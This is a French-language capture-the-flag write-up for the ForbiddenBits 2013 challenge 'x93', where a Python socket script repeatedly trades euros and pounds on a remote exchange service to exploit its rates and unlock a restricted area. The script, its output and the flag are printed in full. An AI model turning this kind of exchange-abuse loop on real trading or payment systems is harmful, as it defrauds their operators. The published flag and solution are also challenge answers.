forbiddenbits_2013

Table des matières

x93 (350)
- Overview
- Solution
- Flag

x93 (350)

i wanna access the restricted area
95.170.83.28:3003

Overview

On se connecte à un service où il est possible de faire des échanges de monnaie (d'une monnaie à une autre). Qui dit échanges, dit taux. Passer d'une monnaie à une autre puis faire le chemin inverse revient à perdre ou à gagner de l'argent !

Le but ici va être de récupérer $5000 à partir de $100, 100€ et 100£.

Solution

J'ai choisie de jouer avec les € et les £ pour ensuite convertir les € en $.

€ => £
£ => €
...
€ => $

import socket
 
def msg(data):
	return data + "\n"
 
def parseamount(buffer):
	splt = buffer.split(' , ')
	usd = splt[0][17:-4]
	eur = splt[1][:-4]
	gbp = splt[2][:-9]
	return (usd, eur, gbp)
 
def main():
	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	sock.connect(('95.170.83.28', 3003))
 
	USD = 100
	EUR = 100
	GBP = 100
 
	sock.recv(512) # welcome message
	sock.recv(512) # wanna trade?
	sock.send(msg('yes')) # YES!
	sock.recv(512) # username?
	sock.send(msg('Xartrick')) # here!
	sock.recv(512) # Thanks!
 
	while 1:
		# GBP to EUR
		sock.recv(512) # get menu
		sock.send(msg('2')) # exchange
		sock.recv(512) # destination?
		sock.send(msg('EUR')) # EUR!
		sock.recv(512) # source?
		sock.send(msg('GBP')) # GBP!
		sock.recv(512) # amount?
		sock.send(msg(str(GBP))) # GBP value
		buffer = sock.recv(512) # get current values
		(USD, EUR, GBP) = parseamount(buffer)
		print 'EUR =>', EUR
 
		if float(EUR) > 5000.0:
			break
 
		# EUR to GBP
		sock.recv(512) # get menu
		sock.send(msg('2')) # exchange
		sock.recv(512) # destination?
		sock.send(msg('GBP')) # GBP!
		sock.recv(512) # source?
		sock.send(msg('EUR')) # EUR!
		sock.recv(512) # amount?
		sock.send(msg(str(EUR))) # EUR value
		buffer = sock.recv(512) # get current values
		(USD, EUR, GBP) = parseamount(buffer)
		print 'GBP =>', GBP
 
	# EUR to USD
	sock.recv(512) # get menu
	sock.send(msg('2')) # exchange
	sock.recv(512) # destination?
	sock.send(msg('USD')) # USD!
	sock.recv(512) # source?
	sock.send(msg('EUR')) # EUR!
	sock.recv(512) # amount?
	sock.send(msg(str(EUR))) # EUR value
	buffer = sock.recv(512) # get current values
	(USD, EUR, GBP) = parseamount(buffer)
	print
	print 'USD =>', USD
	print
 
	sock.recv(512) # get menu
	sock.send(msg('4')) # restricted area
	buffer = sock.recv(512)
	print buffer
 
	sock.close()
 
main()

C:\CTF\FBCTF\x93>script.py
EUR => 253.85
GBP => 218.31
EUR => 335.86
GBP => 288.84
EUR => 444.37
GBP => 382.16
EUR => 587.94
GBP => 505.63
EUR => 777.89
GBP => 668.99
EUR => 1029.22
GBP => 885.13
EUR => 1361.74
GBP => 1171.1
EUR => 1801.69
GBP => 1549.45
EUR => 2383.77
GBP => 2050.04
EUR => 3153.91
GBP => 2712.36
EUR => 4172.86
GBP => 3588.66
EUR => 5521.02

USD => 6062.7

FLAG{7d21ca3a7a2f068347efac7c2c9794bdb3bd0ab0}

Flag

7d21ca3a7a2f068347efac7c2c9794bdb3bd0ab0